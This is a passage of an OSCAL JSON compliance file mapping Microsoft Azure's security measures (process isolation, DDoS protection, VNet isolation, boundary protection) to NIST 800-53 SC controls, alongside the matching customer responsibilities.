Without the internal IP information, traffic is simply blocked."}],"responsibilities":[{"uuid":"aea9cc17-1798-4d04-8d60-619a7ef886a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-006"}],"description":"The customer is responsible for separating system functionality into two separate categories: user functionality and management functionality.","provided-uuid":"ff004786-471c-46e3-9a04-bf74ef4fc526"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"63b473b0-9011-4585-b0ca-9444039afe78","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-3","statements":[{"uuid":"b9e17192-9e7e-4b5c-b08b-2afd046eb0fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-3_smt","by-components":[{"uuid":"46feeeed-38c2-44a9-9dc8-b5968dfd6a0e","export":{"provided":[{"uuid":"c533d3ba-f31e-4767-8563-b30f7c9f193b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-007"}],"description":"All Azure assets run modern operating systems as identified in the Azure inventory. These operating systems maintain separate execution domains for each executing process by assigning a private virtual address space to each process. See the following for more information: <https://technet.microsoft.com/en-ca/aa366785%28v=vs.90%29> All Azure servers use either Intel or AMD processors. 
Both processor types implement isolation by means of protection rings with various privilege levels. User code runs in ring 3, while kernel code runs in ring 0. Security software on the servers, such as antimalware software, is protected using access control lists at the file system level via file permissions. This ensures that only approved users have access to security software. These are technological implementations and are in place continuously. At the network level, Azure implements Jumpboxes, Debug Servers, Hop Boxes, and a VPN to restrict access to security functions. To access security functions, users must first log on to the Jumpboxes, Debug Servers, Hop Boxes, or VPN using multifactor authentication. Azure monitors and audits access using the logging and monitoring pipeline. Azure users must also use JIT to access production assets. In this way, Azure restricts access to security functions by implementing least privilege capabilities throughout the environment."}],"responsibilities":[{"uuid":"36f9f21a-0569-4543-9fb3-66b6cdd863fc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-007"}],"description":"The customer is responsible for isolating security functions from non-security functions for customer-deployed resources.","provided-uuid":"c533d3ba-f31e-4767-8563-b30f7c9f193b"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8775da58-8463-4590-806d-13673d386ac7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-4","statements":[{"uuid":"07c3fca0-b39d-4e11-b6e3-d28f3c4d7396","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-4_smt","by-components":[{"uuid":"111f3499-d69c-4023-ba13-e18a3720e783","export":{"provided":[{"uuid":"5dede073-e3b5-4fae-b57b-f2c53c201b3b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-008"}],"description":"In order to transfer residual information on an Azure asset, the user must first access the asset. Azure prevents unauthorized and unintended information transfer by implementing several technical controls within the network, including isolation via VLANs and Network Security Groups (NSGs), and implementing strict flow control via ACLs to Azure from other internal Microsoft networks and from the internet. Strong access controls including multifactor authentication, JIT, and usage of security groups limit any unauthorized or unintended transfer of information through shared resources at an access control level. Azure performs logging and monitoring on all assets as a detective measure as well. Azure follows strict standards for overwriting storage resources before their reuse or the physical destruction of decommissioned hardware. 
Azure executes a complete deletion of data on customer request and on contract termination. Protection of Virtual Machines (VMs) is provided by hypervisor isolation of the Root OS from the Guest OS and the Guest OS from one another. The hypervisor acts like a micro-kernel and passes all hardware access requests from the Guest OS to the Root OS for processing using a shared-memory interface. This prevents users from obtaining raw read/write/execute access to the system and mitigates the risk of sharing system resources."}],"responsibilities":[{"uuid":"d9c7585a-17b0-40ff-a42b-7c159d4b197b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-008"}],"description":"The customer is responsible for preventing unauthorized and unintended information transfer between customer-deployed resources.","provided-uuid":"5dede073-e3b5-4fae-b57b-f2c53c201b3b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"361048d7-cfb6-473e-8abf-67bc22647260","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-5","statements":[{"uuid":"af3aee91-0eb4-479b-a759-6cf4c5511a15","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-5_smt.a","by-components":[{"uuid":"51f7ef74-b803-42ef-9142-3390ceb59849","export":{"provided":[{"uuid":"4be238b5-0b55-4f73-96e3-ca4a01ca026f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-009"}],"description":"Azure has implemented protection mechanisms as described in Part b below to protect against three kinds of DoS attacks: attacks on bandwidth, attacks on transactional capacity (authentication overhead, IOPS, cache efficiency, etc.), and attacks on storage capacity."}],"responsibilities":[{"uuid":"e462d9c4-515c-419a-b96e-37034f3cf14a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-009"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources from denial of service (DOS) attacks.","provided-uuid":"4be238b5-0b55-4f73-96e3-ca4a01ca026f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fa0574f6-b59f-48ae-ab07-d40d119cb42a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-5_smt.b","by-components":[{"uuid":"ddd74b68-668f-4046-8017-b5d0f6d8dc19","export":{"provided":[{"uuid":"5f4b2108-a7ed-4754-8965-3a1b03c2ef0b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-010"}],"description":"Azure uses A10 distributed denial of service (DDoS) protection network devices that provide automated detection and mitigation. The DDoS protection solution utilizes Azure Network Monitoring (NetMon) to sample network flow packets and determine if there is an attack. Once the attack is detected, the A10s are used as scrubbers to mitigate attacks. After mitigation, further clean traffic is allowed into the Azure environment. 
This involves using the NetMon and Geneva Monitoring features to detect attacks and A10 technology to mitigate them. This solution is designed to withstand attacks from both outside and inside Azure. For attacks initiated within Azure against another Azure tenant, trusted IP filters prevent spoofing of dynamic IP (DIP) addresses. Azure monitors and isolates or removes offending VMs from the network. Additional DoS protection solutions include: * UDP IPv4 and IPv6 flood protection * ICMP IPv4 and IPv6 flood protection * TCP IPv4 and IPv6 flood protection * TCP SYN attack protection for IPv4 and IPv6 * Fragmentation attack protection Azure Storage Azure has implemented protection mechanisms as defined below to protect from DoS attacks on Azure Storage: attacks on bandwidth, attacks on transactional capacity (ICMP (ping) flood, SYN flood, slowloris, buffer overflow attack, and volume attack, etc.), and attacks on storage capacity. Attacks on bandwidth are handled by identifying the IP addresses of assets mounting simple attacks and blocking them as early in the communications stream as possible. The ability to throttle or disable abusive accounts is provided. Storage accounts that suddenly start growing out of proportion to past patterns may represent a DoS attack against a customer or, more likely, a bug in a customer program. This is tracked by actively monitoring bandwidth, transactions, and storage capacity usage and growth by storage account and IP address across the whole storage stamp. If the metrics start to change in an unexpected way, Azure analyzes storage accounts and IP addresses and performs a range of mitigations. These range from throttling the accounts or IPs and contacting the customers to disabling the accounts or IPs or putting them into read-only mode. 
In addition to dealing with abusive storage accounts and IP address ranges in the above manner, Azure Storage monitors the (a) bandwidth, (b) transactions, and (c) storage capacity for each of the stamps. If any of these metrics reach seventy (70) percent of peak capacity provided by the storage stamp, then Azure Storage load-balances storage accounts via geo-replication migration across the storage stamps, preferably within a given geo-location, to keep the capacity below this threshold for each production storage stamp. Azure SQL DB Azure has implemented protection mechanisms as defined below to protect from DoS attacks on Azure SQL DB (ICMP (ping) flood, SYN flood, slowloris, buffer overflow attack, and volume attack, etc.). The Azure SQL DB gateway performs stateful TDS packet inspection while accepting connections from clients to validate the connection information and pass on the TDS packets to the appropriate server based on the database name specified in the connection string. In the back-end, Azure SQL databases are hosted in tenant rings that are deployed in Virtual Networks (VNets). The OneDDOS system protects traffic coming into these VNets. It defines normal thresholds on each endpoint, and if the thresholds are exceeded, it routes the traffic through A10 devices which scrub the traffic to prevent DoS attacks. Additionally, Azure SQL Database offers a variety of network access controls so customers can choose between public or private connectivity. Customers can use a combination of these network access controls to control how clients can connect to SQL Database and thus reduce the surface area for DoS attacks. Public connections are blocked by the SQL DB firewall, and traffic is allowed only when the client IP address is added in the form of a firewall rule. Access from resources inside Azure, such as an Azure VM or Web App, can be accomplished by using Service Endpoints and VNet firewall rules. 
Lastly, customers can use a private endpoint such that Azure SQL DB is associated with a specific private IP address within a specific VNet and subnet."}],"responsibilities":[{"uuid":"bc45f9b4-2e8d-48f7-b028-35f49e3f10f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-010"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources from denial of service (DOS) attacks.","provided-uuid":"5f4b2108-a7ed-4754-8965-3a1b03c2ef0b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"da0b8744-1ea1-4a52-bb15-d876c85f5921","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7","statements":[{"uuid":"1941785e-9730-4f97-b822-11bb04a785eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7_smt.a","by-components":[{"uuid":"b099ee8d-c309-4049-998a-5bc13f945622","export":{"provided":[{"uuid":"d50606b1-e0d9-48ed-b7eb-14c95cc1090b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-011"}],"description":"Azure implements boundary protection through a defense-in-depth strategy. As a cloud service comprised of numerous service teams and customers, logical isolation and segmentation are critical to the secure operations of Azure. 
The strategy includes network segmentation through VLAN and Network Security Group (NSG) segmentation, ACL restrictions, and encrypted communications. Internally, at the network level, Azure implements Jumpboxes, Debug Servers, Hop Boxes, and a VPN to restrict access to the Azure environment. To access the environment, users must first log on to the Jumpboxes, Debug Servers, Hop Boxes, or VPN using multifactor authentication. Azure is logically segmented into the management plane, which is heavily restricted to only key service teams necessary to administer underlying networking and foundational services, and the customer plane, upon which all Azure service teams and external customers reside and operate. Internal Azure service teams utilize the same logical isolation techniques that customers use to ensure their deployments are secure. Microsoft utilizes the Azure Security Pack (AzSecPack) service for log generation, consolidation, and monitoring throughout the Azure cloud. The logical isolation of internal and customer infrastructure in a hyperscale cloud is fundamental to maintaining security. The overarching principle for a virtualized solution is to allow only connections and communications that are necessary for that virtualized solution to operate, blocking all other ports and connections by default. Azure Virtual Networks (VNets) ensure that all private network traffic is logically isolated from traffic belonging to other internal and external networks. Virtual Machines (VMs) in one VNet cannot communicate directly with VMs in a different VNet even if both VNets are created by the same user. Networking isolation ensures that communication between VMs remains private within a VNet. VNets provide isolation of network traffic between tenants as part of their fundamental design. A subscription can contain multiple logically isolated private networks, and include firewall, load balancing, and network address translation. 
Each VNet is isolated from other VNets by default. Multiple deployments inside the same subscription can be placed on the same VNet, and then communicate with each other through private IP addresses. Network access to VMs is limited by packet filtering at the network edge, at load balancers, and at the Host OS level. Each service team additionally configures their host firewalls to further limit connectivity, specifying for each listening port whether connections are accepted from the external networks or only from role instances within the same cloud service or VNet. Azure provides network isolation for each deployment and enforces the following rules: * Traffic between VMs always traverses through trusted packet filters. * Protocols such as Address Resolution Protocol (ARP), Dynamic Host Configuration Protocol (DHCP), and other OSI Layer-2 traffic from a VM are controlled using rate-limiting and anti-spoofing protection. * VMs cannot capture any traffic on the network that is not intended for them. * VMs cannot send traffic to Azure private interfaces and infrastructure services, or to other users' VMs. VMs can only communicate with other VMs owned or controlled by the same team and with Azure service endpoints. * When users put VMs on a VNet, those VMs get their own address spaces that are invisible, and hence, not reachable from VMs outside of a deployment or virtual network (unless configured to be visible via IP addresses). These environments are open only through the ports that users specify for access; if the VM is defined to have an external IP address, then all ports are open for external access. Local connections are disallowed by policy within Azure. No personnel have local access. Azure performs network monitoring and detection of unauthorized connections via Network Isolation (NetIso), which provides the Network Risk Management Service (NRMS) for network baseline measurement, management, and enforcement. 
The service provides an assessment of network security and alerts on internet-exposed endpoints via Incident Management (IcM) based on analysis patterns for configuration issues. Any process that begins offering an open network port is flagged and investigated if it is not part of the approved baseline for that host to ensure detection of network services that have not been authorized as an indicator of compromise. In addition, the implemented host-based SDN firewall uses a deny all policy. Azure's hyperscale network is designed to provide uniform high capacity between servers, performance isolation between services, and Ethernet Layer-2 semantics. Azure uses a number of networking implementations to achieve these goals: flat addressing to allow service instances to be placed anywhere in the network; load balancing to spread traffic uniformly across network paths; and end-system based address resolution to scale to large server pools, without introducing complexity to the network control plane. These implementations give each service the illusion that all the servers assigned to it, and only those servers, are connected by a single non-interfering Ethernet switch - a Virtual Layer 2 (VL2) - and maintain this illusion even as the size of each service varies from one server to hundreds of thousands. This VL2 implementation achieves traffic performance isolation, ensuring that it is not possible that the traffic of one service could be affected by the traffic of any other service, as if each service were connected by a separate physical switch. The Azure network uses two different IP-address families: * The customer address (CA) is the defined/chosen VNet IP address, also referred to as Virtual IP (VIP). The network infrastructure operates using CAs, which are externally routable. All switches and interfaces are assigned CAs, and switches run an IP-based (Layer-3) link-state routing protocol that disseminates only these CAs. 
This design allows switches to obtain the complete switch-level topology, as well as forward packets encapsulated with CAs along shortest paths. * The provider address (PA) is the Azure-assigned internal Fabric address that is not visible to users and is also referred to as Dynamic IP (DIP). No traffic goes directly from the external network to an asset; all traffic from external networks must go through a Software Load Balancer (SLB) and be encapsulated to protect the internal Azure address space by only routing packets to valid Azure internal IP addresses and ports. Network Address Translation (NAT) separates internal network traffic from external traffic. Internal traffic uses RFC 1918 address space or private address space - the provider addresses (PAs) - that is not externally routable. The translation from the PA to the CA is performed at the SLBs. CAs - that are externally routable - are translated into internal provider addresses (PAs) that are only routable within Azure. These addresses remain unaltered no matter how their servers' locations change due to virtual-machine migration or reprovisioning. Each PA is associated with a CA, which is the identifier of the Top of Rack (ToR) switch to which the server is connected. VL2 uses a scalable, reliable directory system to store and maintain the mapping of PAs to CAs, and this mapping is created when servers are provisioned to a service and assigned PA addresses. An agent running in the network stack on every server, called the VL2 agent, invokes the directory system's resolution service to learn the actual location of the destination and then tunnels the original packet there. Azure assigns servers IP addresses that act as names alone, with no topological significance. Azure's VL2 addressing scheme separates these server names (PAs) from their locations (CAs). 
The crux of offering Layer-2 semantics is having servers believe they share a single large IP subnet - i.e., the entire PA space - with other servers in the same service, while eliminating the Address Resolution Protocol (ARP) and Dynamic Host Configuration Protocol (DHCP) scaling bottlenecks that plague large Ethernet deployments. A server cannot send packets to a PA if the directory service refuses to provide it with a CA through which it can route its packets, which means that the directory service enforces access control policies. Further, since the directory system knows which server is making the request when handling a lookup, it can enforce fine-grained isolation policies. For example, it could enforce the policy that only servers belonging to the same service can communicate with each other. To route traffic between servers, which use PA addresses, on an underlying network that knows routes for CA addresses, the VL2 agent on each server captures packets from the host, and encapsulates them with the CA address of the ToR switch of the destination. Once the packet arrives at the CA (i.e., the destination ToR switch), the destination ToR switch decapsulates the packet and delivers it to the destination PA carried in the inner header. The packet is first delivered to one of the Intermediate switches, decapsulated by the switch, delivered to the ToR's CA, decapsulated again, and finally sent to the destination. For external traffic, Azure provides multiple layers of assurance to enforce isolation depending on traffic patterns. When a user places an external IP on their VNet gateway, traffic from the external network that is destined for that IP address will be routed to an Edge Router. Azure then uses Border Gateway Protocol (BGP) to share routing details with the external network to establish end-to-end connectivity. 
When communication begins with a resource within the VNet, the network traffic traverses as normal until it reaches a Microsoft ExpressRoute Edge (MSEE) Router. In both cases, VNets provide the means for Azure VMs to act as part of the user's external network. A cryptographically protected IPsec/IKE tunnel is established between Azure and the user's internal network (e.g., via Azure VPN Gateway or Azure ExpressRoute Private Peering), enabling the VM to connect securely to the user's resources as though it were directly on that network. At the Edge Router or the MSEE Router, the packet is encapsulated using Generic Routing Encapsulation (GRE). This encapsulation uses a unique identifier specific to the VNet destination and the destination address, which is used to appropriately route the traffic to the identified VNet. Upon reaching the VNet Gateway, which is a special VNet used only to accept traffic from outside of an Azure VNet, the encapsulation is verified by the Azure network fabric to ensure: * the endpoint receiving the packet is a match to the unique VNet ID used to route the data, and * the destination address requested exists in this VNet. Once verified, the packet is routed as internal traffic from the VNet Gateway to the final requested destination address within the VNet. This approach ensures that traffic from external networks travels only to the Azure VNet for which it is destined, enforcing isolation. Internal traffic also uses GRE encapsulation/tunneling. When two resources in an Azure VNet attempt to establish communications between each other, the Azure network fabric reaches out to the Azure VNet routing directory service that is part of the Azure network fabric. The directory services use the customer address (CA) and the requested destination address to determine the provider address (PA). This information, including the VNet identifier, CA, and PA, is then used to encapsulate the traffic with GRE. 
The Azure network uses this information to properly route the encapsulated data to the appropriate Azure host using the PA. The encapsulation is reviewed by the Azure network fabric to confirm: * the PA is a match, * the CA is located at this PA, and * the VNet identifier is a match. Once all three are verified, the encapsulation is removed and routed to the CA as normal traffic (e.g., to a VM endpoint). This approach provides VNet isolation assurance based on correct traffic routing between cloud services. Azure VNets implement several mechanisms to ensure secure traffic between tenants. These mechanisms align to existing industry standards and security practices, and prevent well-known attack vectors including: * Prevent IP address spoofing - Whenever encapsulated traffic is transmitted by a VNet, the service reverifies the information on the receiving end of the transmission. The traffic is looked up and encapsulated independently at the start of the transmission, as well as reverified at the receiving endpoint to ensure the transmission was performed appropriately. This verification is done with an internal VNet feature called SpoofGuard, which verifies that the source and destination are valid and allowed to communicate, thereby preventing mismatches in expected encapsulation patterns that might otherwise permit spoofing. The GRE encapsulation processes prevent spoofing as any GRE encapsulation and encryption not done by the Azure network fabric is treated as dropped traffic. * Provide network segmentation across service teams with overlapping network spaces - Azure VNet's implementation relies on established tunneling standards such as the GRE, which in turn allows the use of specific unique identifiers (VNet IDs) throughout the cloud. The VNet identifiers are used as scoping identifiers. This approach ensures that a service team is always operating within their unique address space, overlapping address spaces between tenants, and the Azure network fabric. 
Anything that has not been encapsulated with a valid VNet ID is blocked within the Azure network fabric. In the example described above, any encapsulated traffic not performed by the Azure network fabric is discarded. * Prevent traffic from crossing between VNets - Preventing traffic from crossing between VNets is done through the same mechanisms that handle address overlap and prevent spoofing. Traffic crossing between VNets is rendered infeasible by using unique VNet IDs established per tenant in combination with verification of all traffic at the source and destination. Users do not have access to the underlying transmission mechanisms that rely on these IDs to perform the encapsulation. Consequently, any attempt to encapsulate and simulate these mechanisms would lead to dropped traffic. In addition to these key protections, all unexpected traffic originating from external networks is dropped by default. Any packet entering the Azure network will first encounter an Edge router. Edge routers intentionally allow all inbound traffic into the Azure network except spoofed traffic. This basic traffic filtering protects the Azure network from known bad malicious traffic. Azure also implements DDoS protection at the network layer, collecting logs to throttle or block traffic based on real time and historical data analysis, and mitigates attacks on demand. Moreover, the Azure network fabric blocks traffic from any IPs originating in the Azure network fabric space that are spoofed. The Azure network fabric uses GRE and Virtual Extensible LAN (VXLAN) to validate that all allowed traffic is Azure-controlled traffic and all non-Azure GRE traffic is blocked. By using GRE tunnels and VXLAN to segment traffic using unique keys, Azure meets RFC 3809 and RFC 4110. When using Azure VPN Gateway in combination with ExpressRoute, Azure meets RFC 4111 and RFC 4364. 
With a comprehensive approach for isolation encompassing external and internal network traffic, Azure VNets provide customers with assurance that Azure successfully routes traffic between VNets, allows proper network segmentation for tenants with overlapping address spaces, and prevents IP address spoofing. Service teams are also able to utilize Azure services to further isolate and protect their resources. Using Network Security Groups (NSGs), a feature of Azure Virtual Network, service teams can filter traffic by source and destination IP address, port, and protocol via multiple inbound and outbound security rules - essentially acting as a distributed virtual firewall and IP-based network Access Control List (ACL). Service teams can apply an NSG to each NIC in a Virtual Machine, to the subnet that a NIC or another Azure resource is connected to, or directly to Virtual Machine Scale Sets, allowing finer control over the service team infrastructure. At the infrastructure layer, Azure implements a Hypervisor firewall to protect all tenants running on top of the Hypervisor within virtual machines from unauthorized access. This Hypervisor firewall is distributed as part of the NSG rules deployed to the Host, implemented in the Hypervisor, and configured by the Fabric Controller agent. The Host OS instances utilize the built-in Windows Firewall to implement fine-grained ACLs at a greater granularity than router ACLs; these ACLs are maintained by the same software that provisions tenants, so they are never out of date, and are applied to Windows Firewall using the Machine Configuration File (MCF). At the top of the operating system stack is the Guest OS, which service teams utilize as their operating system. 
By default, this layer does not allow any inbound communication to cloud service or virtual network, essentially making it part of a private network."}],"responsibilities":[{"uuid":"2e8a1ff7-70cc-4c5a-8e3a-d4217b3540ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-011"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for monitoring and controlling communications at and within the managed interfaces of the customer-deployed system.","provided-uuid":"d50606b1-e0d9-48ed-b7eb-14c95cc1090b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0a5dc267-c8a9-4b68-b417-a50e10db460c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7_smt.b","by-components":[{"uuid":"90578d33-4e87-4cc4-b773-9e31734ea878","export":{"provided":[{"uuid":"a27f5e3b-62f5-4707-97f6-9cfc10bf6cea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-012"}],"description":"The only externally accessible components of Azure are the load balancers and the externally-facing server roles. All non-externally accessible Azure components connect to the load balancers via physically separate network interfaces on subnets that are logically separated from internal subnets. The hypervisor is isolated from interactions by virtual machines on port 80. Azure employs Remote Desktop Protocol (RDP) and SSL VPN as the internal/external managed interface for interactive access to the Azure environment. 
Azure requires encrypted connections for connectivity from any of the solutions used to access the environment in accordance with Microsoft security architecture requirements."}],"responsibilities":[{"uuid":"6808aa07-2ee7-44bf-822f-482f2aa90010","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-012"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for implementing subnetworks for customer-deployed resources to logically separate publicly accessible resources from internal resources.","provided-uuid":"a27f5e3b-62f5-4707-97f6-9cfc10bf6cea"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"f6325f66-1947-4c52-96e6-5f6c1c31bb79","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7_smt.c","by-components":[{"uuid":"da541d0d-c327-48ef-9fe2-758959899f5f","export":{"provided":[{"uuid":"68d46e3c-ffb2-4e91-aa2a-4a6934732fa0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-013"}],"description":"Azure connects to external networks or information systems only through Azure Networking's managed networks and Edge Routers. The network interfaces provide boundary protection at the Edge Router network level and are arranged in accordance with the Microsoft and Azure security architectures. 
Additional measures in place to help protect Azure information systems from malicious activities include: * Software load balancers * Non-routable IP addressing * Packet filtering * Host-based firewalls * VLAN and NSG isolation * Jumpboxes, Debug Servers, Hop Boxes, and VPNs All traffic at the boundary is restricted to authorized connections as defined by the service team."}],"responsibilities":[{"uuid":"655ee693-9b87-4025-86e1-0967e5e340ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-013"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for restricting connections to external networks or systems through managed interfaces, consisting of boundary protection devices arranged in accordance with the customer's security and privacy architecture.","provided-uuid":"68d46e3c-ffb2-4e91-aa2a-4a6934732fa0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"119e5131-c95b-48b4-8be5-3aa81f4caa33","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.3","statements":[{"uuid":"c4b90a2e-055c-4315-a448-486f0eb6a714","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.3_smt","by-components":[{"uuid":"cb9cc065-34c5-41b2-8e2c-20aa230ef7f6","export":{"provided":[{"uuid":"65203d42-d4fa-4063-bb42-5c9d49e83911","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-014"}],"description":"Azure controls and monitors all inbound and outbound traffic through a limited number of network access points at the boundary and at key points within Azure. Azure leverages the following security mechanisms to limit the number of external network connections: * Load balancing and limiting inbound access to Azure, Azure Management Portal, front-end (e.g. FFE, XFE, RDFE), and customer VM RDP. Each datacenter contains two groups of Jumpboxes, Debug Servers, and Hop Boxes behind a load balancer to limit the access points for Azure internal traffic, and customer traffic passes through a load balancer as well. Both entry points are monitored and generate audit logs and alerts in near-real time. * Jumpboxes, Debug servers, and Network Hop Boxes control all access to Azure. * Azure services are only accessible to customer users through the Azure provisioning portal and Web Services (REST API) interfaces."}],"responsibilities":[{"uuid":"2c5d9ae9-2629-4ca5-b7b4-1df9306e2569","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-014"}],"description":"The customer is responsible for limiting the number of external connections established to the customer-deployed system.","provided-uuid":"65203d42-d4fa-4063-bb42-5c9d49e83911"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ab0bdd7f-e839-42ca-91d9-aef687b97a00","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.4","statements":[{"uuid":"84befd66-3145-4ede-ab60-22d3db92e1d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.a","by-components":[{"uuid":"403290be-b8b9-467b-b73f-634b81489cec","export":{"provided":[{"uuid":"cf751a80-1e52-41c8-9489-f884a9ad1917","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-015"}],"description":"Network access to Azure is limited by packet filtering at the network edge, at load balancers, and at the Host OS level. 
